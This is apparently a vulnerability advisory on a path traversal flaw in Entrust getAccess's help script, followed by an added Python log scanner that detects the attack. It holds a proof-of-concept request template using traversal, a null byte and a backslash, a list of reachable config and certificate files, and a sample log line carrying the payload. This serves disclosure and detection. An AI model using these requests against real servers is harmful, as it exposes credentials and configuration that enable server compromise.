COMMAND

getAccess

SYSTEMS AFFECTED

getAccess

PROBLEM

Rudi Carell (www.owasp.org) says:

"getAccess[tm]" (still) uses default shellscripts which start java-classes for their web-applications. Due to missing input-validation it is possible to read files with getAccess's permissions on the "getaccess"-machine. (Only works in combination with other input fields as described below.) In connection with config- and other files this can lead to a total server-compromise (don't ask me how :-).

POC-Example:

a HTTP-request to:

http://getAccessHostname/sek-bin/helpwin.gas.bat?

with the following parameters:

mode=
&draw=x
&file=x
&module=
&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]
&chapter=

... will lead to disclosure of [FILE/PATH]

Config-Filelist (depends heavily on config .. and can be found 2 trav's back [../../]):

/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs

SOLUTION

Patch posted on Entrust web site
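
A log check for the request pattern described under PROBLEM, added here as an example and not part of the original advisory or of Entrust's patch: it flags requests to helpwin.gas.bat whose decoded query values contain a NUL byte, a backslash or a parent-directory segment. It assumes access logs in Common/Combined Log Format; the sample log lines and the file name example.conf are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script name taken from the advisory; matching on it alone is an assumption
# about how the request appears in the access log.
TARGET = "helpwin.gas.bat"

# Request field of a Common/Combined Log Format line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(uri):
    """Return {param: [reasons]} for query values carrying a NUL byte,
    a backslash, or a parent-directory segment after URL decoding."""
    parts = urlsplit(uri)
    if TARGET not in parts.path.lower():
        return {}
    findings = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = []
        if "\x00" in value:
            reasons.append("nul-byte")
        if "\\" in value:
            reasons.append("backslash")
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append("dot-dot-segment")
        if reasons:
            findings.setdefault(name, []).extend(reasons)
    return findings

def scan(lines):
    """Yield (line_number, findings) for log lines that match."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            hit = suspicious_params(m.group(1))
            if hit:
                yield n, hit

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=en&chapter=1 HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Jan/2003:10:00:05 +0000] "GET /sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/example.conf%00%5c&chapter= HTTP/1.0" 200 2048',
    '192.0.2.10 - - [01/Jan/2003:10:00:09 +0000] "GET /index.html?x=../.. HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(n, hit)
```

A hit with a 200 response and an unusually large body size is the case to review first, since it suggests the file content was returned.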